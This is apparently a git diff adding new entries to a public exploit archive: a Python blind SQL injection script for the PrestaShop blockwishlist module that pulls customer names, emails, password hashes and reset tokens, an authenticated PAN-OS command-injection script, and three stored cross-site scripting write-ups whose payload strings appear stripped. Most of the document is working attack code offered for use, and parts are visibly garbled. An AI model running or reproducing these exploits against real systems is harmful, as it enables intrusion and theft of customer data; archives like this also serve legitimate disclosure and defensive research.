diff --git a/exploits/multiple/remote/51005.py b/exploits/multiple/remote/51005.py
new file mode 100755
index 000000000..45ba9b1fe
--- /dev/null
+++ b/exploits/multiple/remote/51005.py
@@ -0,0 +1,88 @@
+# Exploit Title: PAN-OS 10.0 - Remote Code Execution (RCE) (Authenticated)
+# Date: 2022-08-13
+# Exploit Author: UnD3sc0n0c1d0
+# Software Link: https://security.paloaltonetworks.com/CVE-2020-2038
+# Category: Web Application
+# Version: <10.0.1, <9.1.4 and <9.0.10
+# Tested on: PAN-OS 10.0 - Parrot OS
+# CVE : CVE-2020-2038
+#
+# Description:
+# An OS Command Injection vulnerability in the PAN-OS management interface that allows authenticated
+# administrators to execute arbitrary OS commands with root privileges.
+# More info: https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/
+# Credits: Mikhail Klyuchnikov and Nikita Abramov of Positive Technologies for discovering and reporting this issue.
+
+#!/usr/bin/env python3
+
+import requests
+import urllib3
+import sys
+import getopt
+import xmltodict
+
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+def banner():
+ print('\n###########################################################################')
+ print('# Proof of Concept for CVE-2020-2038 #')
+ print('# Vulnerability discovered by Mikhail Klyuchnikov and Nikita Abramov of #')
+ print('# Positive Technologies #')
+ print('# https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/ #')
+ print('# #')
+ print('# Exploit by: Juampa RodrÃguez (@UnD3sc0n0c1d0) #')
+ print('###########################################################################')
+
+def exploit(target,user,password,command):
+ apiparam = {'type': 'keygen', 'user': user, 'password': password}
+ apiresponse = requests.get(target+'api/', params=apiparam, verify=False)
+ xmlparse = xmltodict.parse(apiresponse.content)
+ apikey = xmlparse['response']['result']['key']
+ payload = '8.8.8.81111'
+ parameters = {'cmd': payload, 'type': 'op', 'key': apikey}
+ response = requests.get(target+'api', params=parameters, verify=False)
+ print(response.text[50:-20])
+
+def usage():
+ print('\nusage: CVE-2020-2038.py\n\n')
+ print('arguments:')
+ print(' -h show this help message and exit')
+ print(' -t target URL (ex: http://vulnerable.host/)')
+ print(' -u target administrator user')
+ print(' -p pasword of the defined user account')
+ print(' -c command you want to execute on the target\n')
+
+def main(argv):
+ if len(sys.argv) < 9:
+ banner()
+ usage()
+ sys.exit()
+ try:
+ opts, args = getopt.getopt(argv,"ht:u:p:c:")
+ except getopt.GetoptError:
+ banner()
+ usage()
+ sys.exit()
+ for opt, arg in opts:
+ if opt == '-h':
+ usage()
+ sys.exit()
+ if opt == '-t':
+ target = arg
+ if opt == '-u':
+ user = arg
+ if opt == '-p':
+ password = arg
+ if opt == '-c':
+ command = arg
+ banner()
+ exploit(target,user,password,command)
+ sys.exit()
+
+if __name__ == "__main__":
+ try:
+ main(sys.argv[1:])
+ except KeyboardInterrupt:
+ print('Interrupted by users...')
+ except:
+ sys.exit()
\ No newline at end of file
diff --git a/exploits/multiple/webapps/51003.txt b/exploits/multiple/webapps/51003.txt
new file mode 100644
index 000000000..bca44ddde
--- /dev/null
+++ b/exploits/multiple/webapps/51003.txt
@@ -0,0 +1,18 @@
+# Exploit Title: ThingsBoard 3.3.1 'name' - Stored Cross-Site Scripting (XSS)
+# Date: 03/08/2022
+# Exploit Author: Steffen Langenfeld & Sebastian Biehler
+# Vendor Homepage: https://thingsboard.io/
+# Software Link: https://github.com/thingsboard/thingsboard/releases/tag/v3.3.1
+# Version: 3.3.1
+# CVE : CVE-2021-42750
+# Tested on: Linux
+
+#Proof-Of-Concept:
+When creating a rule node (any) and putting a script payload inside the name of the rule node, it is executed upon hovering above the node within the editor.
+
+#Steps
+
+1. Create a new rule node (via the menu "Rule chains")
+2. Put a javascript payload within the name e.g
+3. Save the node
+4. Upon hovering above the node within the editor the payload is executed
\ No newline at end of file
diff --git a/exploits/multiple/webapps/51004.txt b/exploits/multiple/webapps/51004.txt
new file mode 100644
index 000000000..8b06b66bc
--- /dev/null
+++ b/exploits/multiple/webapps/51004.txt
@@ -0,0 +1,19 @@
+# Exploit Title: ThingsBoard 3.3.1 'description' - Stored Cross-Site Scripting (XSS)
+# Date: 03/08/2022
+# Exploit Author: Steffen Langenfeld & Sebastian Biehler
+# Vendor Homepage: https://thingsboard.io/
+# Software Link: https://github.com/thingsboard/thingsboard/releases/tag/v3.3.1
+# Version: 3.3.1
+# Tested on: [relevant os]
+# CVE : CVE-2021-42751
+# Tested on: Linux
+
+#Proof-Of-Concept:
+When creating a rule node (any) and putting a script payload inside the description of the rule node, it is executed upon hovering above the node within the editor.
+
+#Steps
+
+1. Create a new rule node (via the menu "Rule chains")
+2. Put a javascript payload within the description e.g
+3. Save the node
+4. Upon hovering above the node within the editor the payload is executed
\ No newline at end of file
diff --git a/exploits/php/webapps/51001.py b/exploits/php/webapps/51001.py
new file mode 100755
index 000000000..e88f56769
--- /dev/null
+++ b/exploits/php/webapps/51001.py
@@ -0,0 +1,239 @@
+# Exploit Title: Prestashop blockwishlist module 2.1.0 - SQLi
+# Date: 29/07/22
+# Exploit Author: Karthik UJ (@5up3r541y4n)
+# Vendor Homepage: https://www.prestashop.com/en
+# Software Link (blockwishlist): https://github.com/PrestaShop/blockwishlist/releases/tag/v2.1.0
+# Software Link (prestashop): https://hub.docker.com/r/prestashop/prestashop/
+# Version (blockwishlist): 2.1.0
+# Version (prestashop): 1.7.8.1
+# Tested on: Linux
+# CVE: CVE-2022-31101
+
+
+# This exploit assumes that the website uses 'ps_' as prefix for the table names since it is the default prefix given by PrestaShop
+
+import requests
+
+url = input("Enter the url of wishlist's endpoint (http://website.com/module/blockwishlist/view?id_wishlist=1): ") # Example: http://website.com/module/blockwishlist/view?id_wishlist=1
+cookie = input("Enter cookie value:\n")
+
+header = {
+ "Cookie": cookie
+}
+
+# Define static stuff
+param = "&order="
+staticStart = "p.name, (select case when ("
+staticEnd = ") then (SELECT SLEEP(7)) else 1 end); -- .asc"
+charset = 'abcdefghijklmnopqrstuvwxyz1234567890_-@!#$%&\'*+/=?^`{|}~'
+charset = list(charset)
+emailCharset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890_-@!#$%&\'*+/=?^`{|}~.'
+emailCharset = list(emailCharset)
+
+
+# Query current database name length
+print("\nFinding db name's length:")
+for length in range(1, 65):
+ condition = "LENGTH(database())=" + str(length)
+ fullUrl = url + param + staticStart + condition + staticEnd
+
+ try:
+ req = requests.get(fullUrl, headers=header, timeout=8)
+ except requests.exceptions.Timeout:
+ dbLength=length
+ print("Length: ", length, end='')
+ print("\n")
+ break
+
+print("Enumerating current database name:")
+databaseName = ''
+for i in range(1, dbLength+1):
+ for char in charset:
+ condition = "(SUBSTRING(database()," + str(i) + ",1)='" + char + "')"
+ fullUrl = url + param + staticStart + condition + staticEnd
+
+ try:
+ req = requests.get(fullUrl, headers=header, timeout=8)
+ except requests.exceptions.Timeout:
+ print(char, end='')
+ databaseName += char
+ break
+print()
+
+# Enumerate any table
+prefix = "ps_"
+tableName = prefix + "customer"
+staticStart = "p.name, (select case when ("
+staticEnd1 = ") then (SELECT SLEEP(7)) else 1 end from " + tableName + " where id_customer="
+staticEnd2 = "); -- .asc"
+
+print("\nEnumerating " + tableName + " table")
+
+for id in range(1, 10):
+
+ condition = "id_customer=" + str(id)
+ fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2
+
+ try:
+ req = requests.get(fullUrl, headers=header, timeout=8)
+ print("\nOnly " + str(id - 1) + " records found. Exiting...")
+ break
+ except requests.exceptions.Timeout:
+ pass
+
+ print("\nid = " + str(id))
+
+ # Finding firstname length
+ for length in range(0, 100):
+ condition = "LENGTH(firstname)=" + str(length)
+ fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2
+
+ try:
+ req = requests.get(fullUrl, headers=header, timeout=8)
+ except requests.exceptions.Timeout:
+ firstnameLength=length
+ print("Firstname length: ", length, end='')
+ print()
+ break
+
+
+ # Enumerate firstname
+ firstname = ''
+ print("Firstname: ", end='')
+ for i in range(1, length+1):
+ for char in charset:
+ condition = "SUBSTRING(firstname," + str(i) + ",1)='" + char + "'"
+ fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2
+
+ try:
+ req = requests.get(fullUrl, headers=header, timeout=8)
+ except requests.exceptions.Timeout:
+ print(char, end='')
+ firstname += char
+ break
+ print()
+
+ # Finding lastname length
+ for length in range(1, 100):
+ condition = "LENGTH(lastname)=" + str(length)
+ fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2
+
+ try:
+ req = requests.get(fullUrl, headers=header, timeout=8)
+ except requests.exceptions.Timeout:
+ lastnameLength=length
+ print("Lastname length: ", length, end='')
+ print()
+ break
+
+ # Enumerate lastname
+ lastname = ''
+ print("Lastname: ", end='')
+ for i in range(1, length+1):
+ for char in charset:
+ condition = "SUBSTRING(lastname," + str(i) + ",1)='" + char + "'"
+ fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2
+
+ try:
+ req = requests.get(fullUrl, headers=header, timeout=8)
+ except requests.exceptions.Timeout:
+ print(char, end='')
+ firstname += char
+ break
+ print()
+
+ # Finding email length
+ for length in range(1, 320):
+ condition = "LENGTH(email)=" + str(length)
+ fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2
+
+ try:
+ req = requests.get(fullUrl, headers=header, timeout=8)
+ except requests.exceptions.Timeout:
+ emailLength=length
+ print("Email length: ", length, end='')
+ print()
+ break
+
+ # Enumerate email
+ email = ''
+ print("Email: ", end='')
+ for i in range(1, length+1):
+ for char in emailCharset:
+ condition = "SUBSTRING(email," + str(i) + ",1)= BINARY '" + char + "'"
+ fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2
+
+ try:
+ req = requests.get(fullUrl, headers=header, timeout=8)
+ if req.status_code == 500 and char == '.':
+ print(char, end='')
+ email += char
+ except requests.exceptions.Timeout:
+ print(char, end='')
+ email += char
+ break
+ print()
+
+ # Finding password hash length
+ for length in range(1, 500):
+ condition = "LENGTH(passwd)=" + str(length)
+ fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2
+
+ try:
+ req = requests.get(fullUrl, headers=header, timeout=8)
+ except requests.exceptions.Timeout:
+ passwordHashLength=length
+ print("Password hash length: ", length, end='')
+ print()
+ break
+
+ # Enumerate password hash
+ passwordHash = ''
+ print("Password hash: ", end='')
+ for i in range(1, length+1):
+ for char in emailCharset:
+ condition = "SUBSTRING(passwd," + str(i) + ",1)= BINARY '" + char + "'"
+ fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2
+
+ try:
+ req = requests.get(fullUrl, headers=header, timeout=8)
+ if req.status_code == 500 and char == '.':
+ print(char, end='')
+ passwordHash += char
+ except requests.exceptions.Timeout:
+ print(char, end='')
+ passwordHash += char
+ break
+ print()
+
+ # Finding password reset token length
+ for length in range(0, 500):
+ condition = "LENGTH(reset_password_token)=" + str(length)
+ fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2
+
+ try:
+ req = requests.get(fullUrl, headers=header, timeout=8)
+ except requests.exceptions.Timeout:
+ passwordResetTokenLength=length
+ print("Password reset token length: ", length, end='')
+ print()
+ break
+
+ # Enumerate password reset token
+ passwordResetToken = ''
+ print("Password reset token: ", end='')
+ for i in range(1, length+1):
+ for char in emailCharset:
+ condition = "SUBSTRING(reset_password_token," + str(i) + ",1)= BINARY '" + char + "'"
+ fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2
+
+ try:
+ req = requests.get(fullUrl, headers=header, timeout=8)
+ if req.status_code == 500 and char == '.':
+ print(char, end='')
+ passwordResetToken += char
+ except requests.exceptions.Timeout:
+ print(char, end='')
+ passwordResetToken += char
+ break
+ print()
\ No newline at end of file
diff --git a/exploits/php/webapps/51002.txt b/exploits/php/webapps/51002.txt
new file mode 100644
index 000000000..07629098f
--- /dev/null
+++ b/exploits/php/webapps/51002.txt
@@ -0,0 +1,17 @@
+# Exploit Title: Feehi CMS 2.1.1 - Stored Cross-Site Scripting (XSS)
+# Date: 02-08-2022
+# Exploit Author: Shivam Singh
+# Vendor Homepage: https://feehi.com/
+# Software Link: https://github.com/liufee/cms
+#Profile Link: https://www.linkedin.com/in/shivam-singh-3906b0203/
+# Version: 2.1.1 (REQUIRED)
+# Tested on: Linux, Windows, Docker
+# CVE : CVE-2022-34140
+
+
+# Proof of Concept:
+1-Sing-up https://localhost.cms.feehi/
+2-Inject The XSS Payload in Username:
+"> fill all required fields and
+click the SignUp button
+3-Login to Your Account, Go to any article page then XSS will trigger.
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index c390338f5..058e5a4ef 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -18721,6 +18721,7 @@ id,file,description,date,author,type,platform,port
50996,exploits/hardware/remote/50996.txt,"Omnia MPX 1.5.0+r1 - Path Traversal",1970-01-01,"Momen Eldawakhly",remote,hardware,
50999,exploits/windows/remote/50999.py,"Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH)",1970-01-01,r00tpgp,remote,windows,
51000,exploits/linux/remote/51000.txt,"uftpd 2.10 - Directory Traversal (Authenticated)",1970-01-01,"Aaron Esau",remote,linux,
+51005,exploits/multiple/remote/51005.py,"PAN-OS 10.0 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,UnD3sc0n0c1d0,remote,multiple,
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@@ -45062,3 +45063,7 @@ id,file,description,date,author,type,platform,port
50995,exploits/php/webapps/50995.py,"mPDF 7.0 - Local File Inclusion",1970-01-01,"Musyoka Ian",webapps,php,
50997,exploits/php/webapps/50997.py,"NanoCMS v0.4 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,p1ckzi,webapps,php,
50998,exploits/linux/webapps/50998.py,"Webmin 1.996 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Emir Polat",webapps,linux,
+51001,exploits/php/webapps/51001.py,"Prestashop blockwishlist module 2.1.0 - SQLi",1970-01-01,"Karthik UJ",webapps,php,
+51002,exploits/php/webapps/51002.txt,"Feehi CMS 2.1.1 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Shivam Singh",webapps,php,
+51003,exploits/multiple/webapps/51003.txt,"ThingsBoard 3.3.1 'name' - Stored Cross-Site Scripting (XSS)",1970-01-01,"Steffen Langenfeld",webapps,multiple,
+51004,exploits/multiple/webapps/51004.txt,"ThingsBoard 3.3.1 'description' - Stored Cross-Site Scripting (XSS)",1970-01-01,"Steffen Langenfeld",webapps,multiple,